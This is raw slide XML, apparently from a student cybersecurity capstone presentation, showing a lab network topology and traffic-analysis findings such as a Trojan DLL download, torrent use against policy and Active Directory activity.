            <a:pPr indent="0" lvl="0" marL="609600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="409" name="Google Shape;409;gaeeaa6d127_0_58"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2043666" y="2506733"/>
            <a:ext cx="8104666" cy="38840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6191" y="0"/>
            <a:ext cx="11731200" cy="7448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t>Malicious Behavior: Trojan Download </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="416" name="Google Shape;416;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="249900" y="1511200"/>
            <a:ext cx="11590800" cy="5019600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="1219200" lIns="609600" spcFirstLastPara="1" rIns="609600" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-262461" lvl="0" marL="237060" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The windows machine 10.6.12.203 downloaded a malicious DLL file that was identified as a known Trojan</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="533"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="237060" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="533"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="533"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="417" name="Google Shape;417;p38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="537101" y="2635835"/>
            <a:ext cx="11117801" cy="28766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txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9407538" y="1213967"/>
            <a:ext cx="2418300" cy="5046600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="DBD9E8"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="243775" lIns="243775" spcFirstLastPara="1" rIns="243775" wrap="square" tIns="243775">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"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2900"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000"/>
              <a:t>Domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000"/>
              <a:t>:192.168.1.0/24</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000"/>
              <a:t>Netmask: 255.255.255.240</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000"/>
              <a:t>Gateway:192.168.1.0</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"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2900"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000"/>
              <a:t>IPv4: 192.168.1.90</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000"/>
              <a:t>OS: Linux</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000"/>
              <a:t>Hostname: Attacker Machine</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000"/>
              <a:t>IPv4: 192.168.1.105</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000"/>
              <a:t>OS: Linux</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000"/>
              <a:t>Hostname: Capstone</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000"/>
              <a:t>Open Ports: 22, 80</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000"/>
              <a:t>IPv4: 192.168.1.110</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000"/>
              <a:t>OS: Linux</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000"/>
              <a:t>Hostname: Target 1</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000"/>
              <a:t>Open Ports: 22, 80, 111, 139, 445</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000"/>
              <a:t>IPv4: 192.168.1.115</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000"/>
              <a:t>OS: Linux</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000"/>
              <a:t>Hostname: Target 2</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000"/>
              <a:t>Open Ports: 22, 80, 111, 139, 445</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1250"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IPv4: 192.168.1.100</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OS: Linux</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hostname: ELK Server</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Open Ports: 22, 80, 111, 139, 445</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="149" name="Google Shape;149;p4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-14975" y="0"/>
            <a:ext cx="893040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Network Topology</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="150" name="Google Shape;150;p4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-14808" y="6555534"/>
            <a:ext cx="10626450" cy="302400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="365675" spcFirstLastPara="1" rIns="0" wrap="square" tIns="60925">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1900"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="151" name="Google Shape;151;p4"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1744588" y="1022444"/>
            <a:ext cx="5253150" cy="5222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6191" y="0"/>
            <a:ext cx="12046801" cy="7984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a:t>Illegal Downloads: BitTorrent </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="424" name="Google Shape;424;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="134187" y="1130512"/>
            <a:ext cx="11923600" cy="4526400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="1219200" lIns="609600" spcFirstLastPara="1" rIns="609600" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-262461" lvl="0" marL="237060" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A user is violating company policy by downloading non work-related materials from torrents. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="533"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="237060" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="533"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="533"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="425" name="Google Shape;425;p39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="642485" y="2014001"/>
            <a:ext cx="10907033" cy="2940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16400" y="0"/>
            <a:ext cx="12224801" cy="711600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="121900" lIns="609600" spcFirstLastPara="1" rIns="365725" wrap="square" tIns="243825">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="6400"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3067"/>
              <a:t>Malicious Behavior: Active Directory configured on the network</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="431" name="Google Shape;431;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
